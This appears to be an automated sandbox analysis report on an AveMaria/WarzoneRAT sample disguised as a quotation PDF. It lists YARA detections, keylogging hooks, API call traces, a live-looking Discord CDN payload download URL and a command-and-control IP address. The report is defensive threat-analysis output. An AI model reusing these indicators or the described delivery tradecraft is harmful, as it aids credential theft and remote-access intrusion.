                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,33_2_0041154A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00411446 FindFirstFileW,FindNextFileW,33_2_00411446
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,33_2_0040955B

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 91.207.102.163
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET /attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040290E URLDownloadToFileW,ShellExecuteW,33_2_0040290E
                  Source: Joe Sandbox ViewASN Name: M247GB M247GB
                  Source: Joe Sandbox ViewIP Address: 91.207.102.163 91.207.102.163
                  Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
                  Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
                  Source: global trafficTCP traffic: 192.168.2.4:49742 -> 91.207.102.163:26167
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordap
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006ED9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006DE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006DE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvh
                  Source: AppLaunch.exe, 00000018.00000002.473407695.000000000A025000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006DE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006E15000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                  Source: AppLaunch.exe, 00000018.00000002.472848743.0000000006EC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordappD
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: aspnet_compiler.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
                  Source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000026.00000002.472797955.000000000264D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040290E URLDownloadToFileW,ShellExecuteW,33_2_0040290E
                  Source: global trafficHTTP traffic detected: GET /attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.207.102.163
                  Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49729 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Installs a global keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, RB6GPvbQr.cs.Net Code: IaIoDR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,33_2_0040813A
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310399282.0000000000D3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_9d4f3ffb-7
                  Source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_7b309c84-a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  E-Banking Fraud

                  barindex
                  Yara detected AveMaria stealer
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,33_2_00413695

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                  Source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02AD79F00_2_02AD79F0
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02AD2FF00_2_02AD2FF0
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02AD67700_2_02AD6770
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02AD754F0_2_02AD754F
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02ADAB990_2_02ADAB99
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02AD6B2C0_2_02AD6B2C
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02AD76110_2_02AD7611
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02AD67AA0_2_02AD67AA
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02AD6FFB0_2_02AD6FFB
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02AD6F060_2_02AD6F06
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02AD67630_2_02AD6763
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeCode function: 0_2_02AD3C900_2_02AD3C90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_052A424824_2_052A4248
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_052AAF6F24_2_052AAF6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_052A4E6024_2_052A4E60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_052A459024_2_052A4590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB030F024_2_0AB030F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB0902424_2_0AB09024
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB0400024_2_0AB04000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB0594024_2_0AB05940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB0B25224_2_0AB0B252
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB0901824_2_0AB09018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB0000624_2_0AB00006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB0004024_2_0AB00040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB0A48024_2_0AB0A480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB0A56824_2_0AB0A568
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeCode function: 25_2_02A3529825_2_02A35298
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeCode function: 25_2_02A3604025_2_02A36040
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeCode function: 25_2_02A32B3425_2_02A32B34
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeCode function: 25_2_02A359F425_2_02A359F4
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeCode function: 25_2_02A30F3825_2_02A30F38
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeCode function: 25_2_02A3528925_2_02A35289
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeCode function: 25_2_02A352D225_2_02A352D2
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeCode function: 25_2_02A3610125_2_02A36101
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeCode function: 25_2_02A364E025_2_02A364E0
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeCode function: 25_2_02A35AEB25_2_02A35AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0041327933_2_00413279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0041DEAA33_2_0041DEAA
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 36_2_00D7604036_2_00D76040
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 36_2_00D7529836_2_00D75298
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 36_2_00D759F436_2_00D759F4
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 36_2_00D7610136_2_00D76101
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 36_2_00D752D236_2_00D752D2
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 36_2_00D7528936_2_00D75289
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 36_2_00D764E036_2_00D764E0
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 36_2_00D75AEB36_2_00D75AEB
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 38_2_008A604038_2_008A6040
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 38_2_008A529838_2_008A5298
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 38_2_008A59F438_2_008A59F4
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 38_2_008A610138_2_008A6101
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 38_2_008A528938_2_008A5289
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 38_2_008A52D238_2_008A52D2
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 38_2_008A64E038_2_008A64E0
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeCode function: 38_2_008A5AEB38_2_008A5AEB
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
